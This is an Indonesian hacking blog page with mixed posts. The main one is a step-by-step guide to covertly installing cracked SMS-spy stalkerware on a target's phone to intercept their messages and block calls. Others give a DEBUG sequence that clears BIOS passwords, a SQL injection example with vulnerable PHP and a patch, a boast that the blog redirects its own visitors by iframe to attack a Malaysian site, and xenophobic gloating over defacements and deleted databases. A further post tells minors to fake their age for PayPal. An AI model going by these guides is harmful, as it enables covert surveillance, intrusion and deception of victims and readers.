Blog nya Orang Bego

Cyber, Hacking, Tutorial, Virus,Anti Virus and more

SMS SPY (Menyadap SMS) PART 2

Posted by adixersoft pada 11/12/2010

SMS SPY PART 2

sebelum nya gw udah pernah nulis artikel ini dengan judul sms spy juga

dengan menggunakan applikasi ini link sms spy yg dulu

OK kali ini saya akan bagi software sms spy yang sudah ada Crack nya

langsung aja

________________

HP yang support : SYMBIAN 9v3 dan v5
Nokia 3250, 5230, 5320 XpressMusic, 5500 Sport, 5530 XpressMusic, 5630 Xpress Music, 5700 XpressMusic, 5730 XpressMusic, 5800 XpressMusic, 6110 Navigator, 6120 classic, 6121 classic, 6122c, 6124 classic, 6210 Navigator, 6220 Classic, 6290, 6650 Fold, 6720 Classic, 6730 classic, 6790 Mako,Surge, E50, E51, E52, E55, E60, E61, E62, E63, E65, E66, E70, E71, E72, E90, N71, N73, N75, N76, N77, N78, N79, N80, N81, N82, N85, N86, N91, N92, N93, N95, N96, N97, N97 Mini, X6
Samsung GT i7110, GT i8510 Innov8, GT i8910 Omnia, SGH G810, SGH i450, SGH i550, SGH i560, SGH L870
Sony-Ericsson G700, G900, M600, P1i, P990, U1 Satio, W950, W958, W960
LG KS10 Joy, KT610
Motorola RIZR Z10, RIZR Z8

Installernya bisa didownload disini

Manual instalasi silahkan sedot disini

Sign tools silahkan didownload disini

Cara pakai :
1. Bro/sis harus tau IMEI target (IMEI HP yang mau dipasang aplikasi ini). Caranya, dari HP target, tekan *#06#, lalu akan muncul 15 digit angka, itulah imei target.
2. Silahkan catat dan registrasikan disini untuk mendapatkan .cer dan .key file. Untuk yang belum punya account, silahkan daftar saja. GRATIS kok. Tunggu 4-6 jam kemudian, lalu login kembali ke TKP, anda akan mendapatkan .cer dan .key nya
3. Sign .cer dan .key yang sudah diperoleh dengan menggunakan sign tools. Aplikasi siap digunakan
4. Lanjutkan dengan menginstall di HP target dengan mengikuti manual yang sudah bro/sis download

Perintah tambahan selain yang dimanual :
* Off : Untuk menghentikan sementara penyadapan
* On : Untuk menghidupkan kembali penyadapan
* Add sender +62818xxxxxx,+62811xxxxxx : Untuk menyadap aktifitas sms dari dan ke nomer tertentu saja
* Add : Untuk kembali menyadap semua nomer
* Block on : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap
* Block off : Untuk mematikan blokir telpon diatas (defaultnya ini yang aktif)

Semoga bermanfaat …………….

namanya  juga crackan jadi maaf kalow agak ribet dikit

Posted in Tutorial | Dengan kaitkata: , , , , , , , | Leave a Comment »

SOFTWARE PETA SELURUH KOTA DI INDONESIA

Posted by adixersoft pada 10/12/2010

kalo ada yang butuh peta seluruh kota di indonesia, ini gw sharing versi portable Peta kota seluruh Indonesia Peta lengkap ini berguna buat yang sering berpergian ke kota- kota seluruh Indonesia. Peta ini dilengkapi dengan nama jalan, gedung kantor, bank/atm, pom bensin, restoran, sekolah, RS, terminal, hotel, dealer kendaraan dll di seluruh indonesia ukuran file terbilang kecil 156 Mb, bila dibandingkan dengan area yang di cover oleh peta ini (seluruh kota-kota di Indonesia) Sangat berguna membantu mencari jalan dikota yang belum kita kenal. karena mapsource bisa menentukan rute jalan / recalculate route dari satu titik ke titik tujuan dengan menghindari jalan satu arah. tested mencari rute jalan di yogya, bisa menghindari jalan satu arah dengan cara memutar mencari jalan lain. bisa open file *.gpx dari program gpsed, garmin mobile xt pada HP yang dilengkapi GPS, sehingga record track jalan-jalan yang telah dilalui bisa dilihat pada peta di komputer (mapsource).

silakan ambil di http://bram127.4shared.com

folder : peta portable

file : – Portable MapSource Free Indonesia Map.part1.rar

- Portable MapSource Free Indonesia Map.part2.rar

[Mapsourcenya garmin + Free Indonesia Map v.1.70]

Gak perlu pake GPS atau garmin atau hardware tambahan
apapun dikomputer, gak perlu online internet juga.
yang penting komputer ada OS windows xp sp2
gak usah install, klik file exe nya aja langsung jalan.
file bisa simpan di flashdisk, klo lagi traveling langsung aja
jalanin dari notebook atau dari komp warnet juga bisa.

Note: program ini tidak jalan di windows 7

Sumber : bram777

Posted in Informasi Teknologi | Dengan kaitkata: , , , , , , , , , , , , , , , , | Leave a Comment »

Daftar perintah-perintah penting di RUN

Posted by adixersoft pada 10/12/2010

Pada windows banyak Fungsi2 yang sebagian org belum mengetahui nya

berikut saya kasih tau beberapa perintah-perintah yg sering di gunakan dan jarang di gunakan

Berikut di bawah ini Daftar perintah2 penting di RUN :

_______________________________________________

Code:Accessibility Controls – access.cpl
Add Hardware Wizard – hdwwiz.cpl
Add/Remove Programs – appwiz.cpl
Administrative Tools – control admintools
Automatic Updates – wuaucpl.cpl
Bluetooth Transfer Wiz – fsquirt
Calculator – calc
Certificate Manager – certmgr.msc
Character Map – charmap
Check Disk Utility – chkdsk
Clipboard Viewer – clipbrd
Command Prompt – cmd
Component Services – dcomcnfg
Computer Management – compmgmt.msc
Date / Time Properties – timedate.cpl
DDE Shares – ddeshare
Device Manager – devmgmt.msc
Direct X Control Panel – directx.cpl
Direct X Troubleshooter – dxdiag
Disk Cleanup Utility – cleanmgr
Disk Defragment – dfrg.msc
Disk Management – diskmgmt.msc
Disk Partition Manager – diskpart
Display Properties – control desktop
Display Properties – desk.cpl
Display Properties – control color (w/Appearance Tab Preselected)
Dr. Watson – drwtsn32
Driver Verifier Utility – verifier
Event Viewer – eventvwr.msc
File Signature Verification Tool – sigverif
Findfast – findfast.cpl
Folders Properties – control folders
Fonts – control fonts
Fonts Folder – fonts
Free Cell Card Game – freecell
Game Controllers – joy.cpl
Group Policy Editor (XP Prof) – gpedit.msc
Hearts Card Game – mshearts
Iexpress Wizard – iexpress
Indexing Service – ciadv.msc
Internet Properties – inetcpl.cpl
Java Control Panel (If Installed) – jpicpl32.cpl
Java Control Panel (If Installed) – javaws
Keyboard Properties – control keyboard
Local Security Settings – secpol.msc
Local Users and Groups – lusrmgr.msc
Logs You Out Of Windows – logoff
Microsoft Chat – winchat
Minesweeper Game – winmine
Mouse Properties – control mouse
Mouse Properties – main.cpl
Network Connections – control netconnections
Network Connections – ncpa.cpl
Network Setup Wizard – netsetup.cpl
Notepad – notepad
Nview Desktop Manager – nvtuicpl.cpl
(If Installed)
Object Packager – packager
ODBC Data Source Admin – odbccp32.cpl
On Screen Keyboard – osk
Opens AC3 Filter (If Installed) – ac3filter.cpl
Password Properties – password.cpl
Performance Monitor – perfmon
Phone and Modem Options – telephon.cpl
Power Configuration – powercfg.cpl
Printers and Faxes – control printers
Printers Folder – printers
Private Character Editor – eudcedit
Quicktime (If Installed) – QuickTime.cpl
Regional Settings – intl.cpl
Registry Editor – regedit
Registry Editor – regedit32
Remote Desktop – mstsc
Removable Storage – ntmsmgr.msc
Removable Storage – ntmsoprq.msc
Operator Requests
Resultant Set of Policy (XP Prof) – rsop.msc
Scanners and Cameras – sticpl.cpl
Scheduled Tasks – control schedtasks
Security Center – wscui.cpl
Services – services.msc
Shared Folders – fsmgmt.msc
Shuts Down Windows – shutdown
Sounds and Audio – mmsys.cpl
Spider Solitare Card Game – spider
SQL Client Configuration – cliconfg
System Configuration Editor – sysedit
System Configuration Utility – msconfig
System Properties – sysdm.cpl
Task Manager – taskmgr
Telnet Client – telnet
User Account Management – nusrmgr.cpl
Utility Manager – utilman
Windows Firewall – firewall.cpl
Windows Magnifier – magnify
Windows Management Infrastr. – wmimgmt.msc
Windows System Security Tool – syskey
Windows Update Launches – wupdmgr
Windows XP Tour Wizard – tourstart
Wordpad – write

[b][u]CMD Commands[b][u]
IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns
IP Configuration (Release All Connections) ipconfig /release
IP Configuration (Renew All Connections) ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns
IP Configuration (Display DHCP Class ID) ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid
System File Checker Utility (Scan Immediately) sfc /scannow
System File Checker Utility (Scan Once At Next Boot) sfc /scanonce
System File Checker Utility (Scan On Every Boot) sfc /scanboot
System File Checker Utility (Return to Default Setting) sfc /revert
System File Checker Utility (Purge File Cache) sfc /purgecache
System File Checker Utility (Set Cache Size to size x) sfc /cachesize=x

Posted in Informasi Teknologi | Dengan kaitkata: , , , , , , , , , , , , | 1 Comment »

CD & DVD Recovery Tools

Posted by adixersoft pada 02/02/2009

gimana si caranya merecovery CD dan DVD= :-)

CD atau DVD juga termasuk media simpan yang perlu dirawat dan dilindungi dengan baik. Maklum, kemungkinan rusak, tergores, atau luka terbuka lebar. Jika disimpan saja, ancaman jamur pun siap menerjang.
Jika semua itu terjadi, data memang terancam hilang. Namun, jika kondisinya tidak terlalu rusak parah, Anda masih dapat menyelamatkannya. Para penyelamat data dalam bentuk program data recovery khusus untuk CD/DVD – bahkan untuk keping data baru semacam Blu-ray – tersedia. Mulai dari yang gratis dan berbayar. Ini pilihannya.
” JFileRecovery 0.92 – www.mydisk.co.uk
” CD Roller – www.cdroller.com
” CD Reader 0.8.2.0 – alievrenkut.sitemynet.com
” CD Recovery Toolbox Free 1.1.8 – www.oemailrecovery.com
” CD Recover 1.0 – www.adrianboeing.com/tools.html#cdcopy
” IsoPuzzle 1.7 Beta – www.geocities.com/marsoupilamis/DocEnglish.htm
” CDCheck 3.1.13 – www.elpros.si/CDCheck

Posted in Artikel | Dengan kaitkata: , , | 2 Comments »

Main PS2 Di PC Dengan Emulator

Posted by adixersoft pada 30/01/2009

Adizonners sekarang gw akan ngebahas bagai mana cara maenin games PS2 di PC, tapi ada minimum spesifikasi untuk PC yang bakal di mainkan..

Processor : Pentium 4       2.66Ghz

Memory: 1 Gb atau lebih

Video Card : 128Mb

PLAYER :  harus DVD 18x atau lebih

kalau di atas udah sama atau lebih dengan spesifikasi komputer di rumah kamu , berarti kamu udah bisa maenin game PS2 di PC kamu begai mana caranya .

pertama

download Software pcsx2 emulatorUntuk PS2  di sini

Kedua

Download Plugin nya di sini

Ketiga

ketiga ini sebenarnya gak boleh di kasih akrena mempunyai licensi nya SONY , jadi kalian harus punya BIOS nya saran gw cari aja di googel dengan kata kunci PS2 BIOS .

kalo ketiganya udah punya semua tinggal lo setting dech config nya kasi gini

cdvdconfigure

graphics2 Setelah semua nya udah di setting persis kaya gini….jangan lupa masukin CD PS2 ke DVD yang ada PC kamu lalu klick RUN dan tarammm….Selamat ber main :-)

Posted in Artikel | Dengan kaitkata: , , | 65 Comments »

BUKA PASSWORD BIOS

Posted by adixersoft pada 29/01/2009

memberikan Password pada bios memang aman akan tetapi akan jadi mala petaka besar apabila password bios kita lupa…nahloe..gimana tuh..??

gak usah takut adizonners kali ini gw akan berbagi ilmu dengan kalian tentang bagai mana membuka password pada bios anda..agar kembali normal atau menghilangkan password bios.. begini trik nya.

untuk menghilangkan password bios kita harus masuk ke program Debug bawaan DOS.
Masuk ke mode DOS setelah muncul prompt DOS c:> ketikkan DEBUG seperti ini

c:>DEBUG
Untuk selanjutnya ketikkan
o 70 2e
o 71 ff
Q
Pada layar monitor akan terlihat seperti dibawah ini c:>DEBUG
-o 70 2e
-o 71 ff
-Q

setelah mengetikkan Q anda akan keluar dari debug yang menandakan anda sudah selesai. Selanjutnya restart komputer anda, tekan DEL dan HORRE anda sudah bisa masuk ke BIOS.

Semoga artikel ini dapat membantu kesulitan anda….Salam adizonnerss :-) jangan lupa kasih commend ya….

Posted in Hacking | Dengan kaitkata: , , | 9 Comments »

Emblim nija saga geratis

Posted by adixersoft pada 11/03/2010

bagi teman2 yg lg main NINJA SAGA
klw kalian mau dpt emblem n token secara gratis
caranya gampang banget

pertama2 kalian bikin dl rekening paypal
daftarnya d http://www.paypal.com
n jgn lupa bahasanya d ubah
supaya kalian mudah membaca caranya

nah!!! d situ ad d suruh pilih :
– pribadi
– primer
– bisnis

utk kalian yg main NS
cukup pilih PRIBADI aj

lalu klik memulai

setelah itu isi formulirnya

catatan : utk kolom tanggal lahir
format isiannya BULAN/TANGGAL/TAHUN
dan tahunnya harus yg berumur 18 tahun ke atas
berarti isi aj TAHUN 1990

krn sering d situ banyak yg salah

dan bagi yg tdk ad kartu kredit

caranya
d situ ad tulisan
“Hubungkan kartu kredit saya, supaya saya dapat segera mulai berbelanja (dianjurkan)”

yg d centang

kalian cukup menghilangkan centangnya
setelah formulirnya d isi
lalu klik SETUJU DAN BUAT REKENING

setelah itu
maka akan tampak gambar kartu kredit

kalian abaikan saja

kalian klik aj langsung tulisan MASUK KE REKENING SAYA

setelah nampak tabel n saldo paypal anda $0.00 USD

kalian klik LOG OUT

lalu kalian periksa kotak surat email kalian
utk mengkonfirmasikan paypal kalian

supaya nnt bs d LOG IN lagi

setelah msk ke inbox email kalian
d situ ad tulisan HUBUNGKAN KARTU ANDA
lalu klik

nnt ad d minta kode sandi
masukkan aj kode sandi yg kalian bikin td
wkt isi formulir

lalu klik KONFIRMASI

setelah itu
nnt kita d minta msk in dua buah pertanyaan keamanan
pilih aj pertanyaannya
n d jawab
caranya sama kok kayak kita bikin email

kalian pst nya ngerti kan?

setelah d pilih n d isi
lalu klik KIRIMKAN

setelah keluar tampilan baru
kalian langsung klik MASUK KE REKENING SAYA

berhasil dech registrasinya

sekarang masalah survey nya

kalian klik tautan berikut ini ;

http://www.AWSurveys.com/HomeMain.cf…evil_nongkrong

n kalian isi formulirnya

setelah d isi formulirnya
lalu klik CREATE FREE ACCOUNT

lalu ikuti dech survey2 nya

dgn cara meng klik tulisan

WELCOME SURVEY $6.00
$4.00
sampai yg tulisan JANUARY BONUS

jd yg pertama kalian klik yg welcome survey $6.00 dl
lalu nnt akan keluar tampilan baru
lalu klik START SURVEY

lalu nnt ad tampilan baru
d situ kalian d mnt msk in website

jd masukin aj http://www.paypal.com
ke dua2 nya

setelah itu tekan ENTER

nah nnt ad kluar tampilan yg bertulisan

Click Here to go Home and to see your New Balance

klik aj
berarti kalian berhasil melakukan survey nya
gampang kan

lalu lakukan lg seperti hal yg sama sprt yg d ats

berikut nya kalian klik $4.00

dan seterusnya

nnt kalian akan memperoleh $27.00

utk mendapatkan $75
kalian hrs refer friends

caranya klik REFER FRIENDS

lalu d situ nnt ad tulisan

Your Direct Referring Link is below

d bawahnya ad tautan sperti punya gw

http://www.AWSurveys.com/HomeMain.cf…evil_nongkrong

nnt kalian blok lalu kalian copy

n paste kan d dinding2 grup atau dinding2 profil teman2 u

nnt klw ad yg meng klik tautan u
n ad yg mendaftar

nnt otomatis dollar u meningkat secara otomatis sebesar $1.25

jika dollar u udh mencapai $75
baru u bs redeem kan

caranya d bawah tabel jumlah dollar survey u

d situ ad tulisan REDEEM MONEY

d klik aj

lalu setelah muncul tampilan baru

d tulisan Redeem Amount ad pilihan
– $75
– $200
– $350
– $500

u pilih berapa jumlah dollar u skrg

lalu d tulisan Redeem Method ad pilihan uga

n u pilih yg PAYPAL

krn d ats td kan kita bikin PAYPAL
berarti uang nya nnt msk nya d REKENING PAYPAL kalian yg kalian bikin tadi

setelah itu klik REDEEM NOW

nnt kita d minta msk in alamat email yg kita pakai buat PAYPAL td

lalu masukin aj alamat email nya
lalu tekan ENTER

maka d situ kluar tulisan
supaya kita menunggu 5 hari

maka dollar2 tsb akan msk ke REKENING PAYPAL setelah 5 hari kemudian

setelah 5 hari kemudian

kalian cek saldo rekening kalian d PAYPAL

apakah bertambah

jika bertambah

maka langsung kalian buka NINJA SAGA
n langsung msk ke GET TO EMBLEM

d situ kita pilih
mau pake metode pembayaran apa
utk membeli emblemnya

tanpa ragu2
n penuh keyakinan

kalian pilih metode pembayaran PAYPAL

dan akhirnya kalian mendapatkan emblem

nah kan msh ad tu lbh dollarnya
$56

krn harga emblem cm $19.00

jd lebihnya kalian beli aj TOKEN !!!!

Posted in Tutorial | Dengan kaitkata: , , , , , | 2 Comments »

PAtch Sql Injection’s

Posted by adixersoft pada 09/10/2009

Sekarang kita coba, untuk ngepatch bug SQLi itu sendiri.

Hallo adizonners sorry nich dach lama gak ngebloger lagi soalnya sibux ma kerjaan
oke sekrang gw mau bahas tentang security web agar terhindar dari serangan hacker
biasanya hacker menggunakan tehnik magic Quote alias SQL Injections
contoh:
Misalkan saja targetnya http://www.Targetkita.com/news.php?nid=76′
Ketika kita menambahkan quote (‘)pada akhir url, kita mendapatkan error.
Sekarang kita tahu bahwa file yang bermasalah adalah news.php dg input “nid”.
Sekarang kita lihat source codenya…abis itu kita petch biar terhindar dari serangan SQL injections

if($nid)
{
$sql = “SELECT * FROM News “;
$sql .= “WHERE News_ID = $nid”;
}
else
{
$sql = “SELECT * FROM News “;
$sql .= “ORDER BY News_ID DESC LIMIT 0,1″;
}

Nah, kelihatan kan?? jelas bahwa disitu tidak ada filter, sehinggal attacker bisa melakukan Injecti melalui input “$nid”.
Ada beberapa cara untuk patch bug SQLI, yaitu dengan memfilter karakter, maupun membatasi length pada input.
Beberapa perintahnya antara lain:

1. Agar hanya angka pada input
if (!preg_match(“/^[0-9]+$/”, $nid))
{
command;
}

2. Agar tidak ada nilai minus pada input
if ($nid 3)
{
command;
}

command bisa anda ganti sesuka anda.
Seboga artikel ini cukup berarti buat kalian para administrator web agar terhindar dari serangan hacker
Aapa lagi hacker maling sial….biasanya si kalo hacker indonesia gk pernah mau deface situs Indo…
paling cuman ngingetin doang…Oke sekian dulu..silahkan di coba
THx to : devil_nongkrong and devilzc0de crew

Posted in Hacking | Dengan kaitkata: , , , , , , , , , , , , | 1 Comment »

Seru Juga Pertarungan antara hacker Indonesia Vs Malaysia

Posted by adixersoft pada 05/10/2009

Kronologi pertarungan di mulai dari Pencurian budaya Tari pendet
Para hacker indonesia melampiaskanya dengan melakukan deface ke situs2 malaysia
Puncaknya website kamuniatas hacker malaysia
Dark-malaysia.net di hajar sama anak Jasakom sampai Lumpuh servernya
wauakakka Mampus kau maling budaya indonesia..!!!
Kemudian hacker Malaysia bersatu melakukan serangan balik Ke Jasakom.com
hingga akhirnya jasakom.com pun runtuh di deface sama hacker dari TBD.my
database jasakom pun di dumping sampai2 semua acount yg terdaftar di forum jasakom harus melakukan
penggantian password…hebatnya jasakom.com pun segera berdiri lagi gak kaya malingsial
abis di doss langsung gak bisa benerin wuakakak Menyedihkan…

kemudian rekan2 seperjuangan hacker indonesia kembali bersatu padu merapatkan barisan
Atas nama hacker indonesia dan Jebolnya jasakom.com para hackerpun mulai beraksi melakukan serangan
balik kali ini targetnya TBD.my dan hasilnya adalah sempuurna server berhasil di tembus index.php nya pun bisa di deface
database nya langsung di delete wuakakak Menyedihkan sekali akanya jangan membangunkan macan yg sedang tidur

HACKER MALAYSIA PURE 100% MALING
kenapa gw bilang begitu karena terbukti selama ini meraka sering bermain di forum2 hacker indonesia seperti jasakom.com dan jatimcrew.org dan sebagainya…mereka pun menimba ilmu dari forum2 kita gak kreatif cuman bisa mencuri ilmu dasar malingsial sampai2 nembus jasakom.com aja mengunakan tehnik milik hacker indonesia Otak mereka = 0

Beda dengan hacker indonesia real 100% karya cipta sendiri tanya sama negara barat pun di akui bahwa hacker dari indonesia itu di takuti setelah turki dan arabic……….malaysia cuman bisa bacoot terus mampir ke indo nyolong ilmu gak kreatif dasar bodoh

makan tuch tbd.my sama dark-malaysaia.net gak ada tai-tainya…wkwkwkwk

Posted in Artikel | Dengan kaitkata: , , , , , , , , , | 32 Comments »

INdonesia HAcker Vs Malaysia Hacker

Posted by adixersoft pada 04/10/2009

setiap kali anda meng aksess Blog ini akan melakukan redirect ke
TBD.my konsep yg sama saat tbd.my menyerang jasakom…sekarang kita bales
Ku persembahkan untuk TBD.MY makan tuh iframe….wuakak

Posted in Artikel | Dengan kaitkata: , , , , , , , , , , , , , , , , , , , , , , , , , , | 6 Comments »

Cari duit di Facebook Gampang

Posted by adixersoft pada 14/06/2009

Pertama kali gw buka facebook gw dah di ajak main games Zgna.com yang gambarnya singa yaitu game

TEXAS HOLDEM POKER

Seru juga si pertama kali maen di kasih modal chips sebesar 1000$

awalnya sering menag sampe tembus ke 1m poker pro lama kelamaan gw kalah sampe chips gw $0

wah…parah, di sini gw dah kaya ke ranjingan….gimana gituh kesel campur Bete pengen cepet cepet dapet modal lagi…

akhirnya setelah hari berikut nya dengan modal 1000$ gw bisa maen sampe sekitar 2mingguan chips gw dah terkumpul 67M mantap kan…….karena seru nya maen di meja gede…

temen gw yang kalah ngeluh terus…minta ma gw supaya di transferin chips nya buat modal katanya akhir nya gw kasih dia modal.

beberapa hari kemudian gw buka google gw serch kata kunci chips poker gw heran kok ada yang jualan chips poker texas holedm poker di facebook ya…dan ilegal….karena seharus nya kalo mao beli langsung ke zgna.com nya akan dapat icon VIP. tapi ini ilegal

dari sinilah gw selalu menawarkan barang siapa yang chips nya abisss saat maen games texsas holdem poker di facebook bisa beli sama gw

1M=10ribu dan semua itu gw tulis di wall akhirnya banyak banget yang minat…….buseeeett sampe2 stok chips gw abisss sisa 3m tinggal buat modal maen lagi..

gimana cara pembayaran nya bisa transfer ke rek kening bisa barter pake pulsa hp.

terus gimana cara transfer nya….cari meja kosong duduk berdua….yang mao transfer all in terus bangun..nanti yang menag an client kita dan seterus nya sampai jumlah chips yang di setujui tercapai..

mungkin buat kalian yang hobbi buka facebook sekarang jangan hanya asal maen games aja…lumayan kan kalo hasilnya bisa jadi uang….cuman modal dengkul dan internet doang…..

samapai saat ini gw masih ngejualin chips texsas holdem poker di facebook yang berminat silahkan add YM gw di adixersoft@yahoo.com….

untuk harga 1m=10ribu jika pembelian 10M bonus 1M jadi 11M

semoga tips ini bisa bermanfaat bagi anda semua salammm adizonners

Posted in Artikel | Dengan kaitkata: , , , , , , , , , , , | 12 Comments »

Awas , Virus Ponsel di prediksi mewabah

Posted by adixersoft pada 28/05/2009

Terjangan virus yang menimpa ponsel, khususnya smartphone memang belum segarang serangan virus di komputer yang bisa langsung menyebar seketika. Namun jangan lengah, kemungkinan tak lama lagi ‘wabah’ infeksi virus ponsel secara massal juga diprediksi bakal terjadi.

Itulah peringatan yang tertera dalam studi oleh Center for Complex Network Research, Northeastern University, Amerika Serikat. Albert-Laszlo Barabasi. Kepala Pusat Penelitian itu menyatakan virus ponsel belum mewabah saat ini karena pasar ponsel masih terfragmentasi.

Dia memperingatkan, virus ponsel bakal jadi ancaman serius ketika pangsa pasar sebuah sistem operasi tunggal tumbuh pesat. Dengan pertimbangan pertumbuhan pasar smartphone sekitar 150 persen per tahun, ancaman ini mungkin terjadi tak lama lagi.

Posted in Artikel | Dengan kaitkata: , , , | 1 Comment »

CHEET DI FACEBOOK

Posted by adixersoft pada 24/05/2009

beberapa hari yang lalu gw liat ada org main facebook muncul flash gitu di facebooknya contoh nya kayak gini ..
Image

nah ane cari cari dech di forum2 dan googleling  dan akhirnya ketemu …

gini caranya :
pertama login FB …
kedua ketika masuk FB siap siap teken tombol ATAS,ATAS,BAWAH,BAWAH,KIRI,KANAN,KIRI,KANAN,B,A,ENTER <<< NAH itu doang tombolnya pokoknya tekennya setelah masuk dan login FB yah ,… nanti muncul flash kaya gambar di atas gitu …

Posted in Tutorial | Dengan kaitkata: , , , | 10 Comments »

 
Ikuti

Get every new post delivered to your Inbox.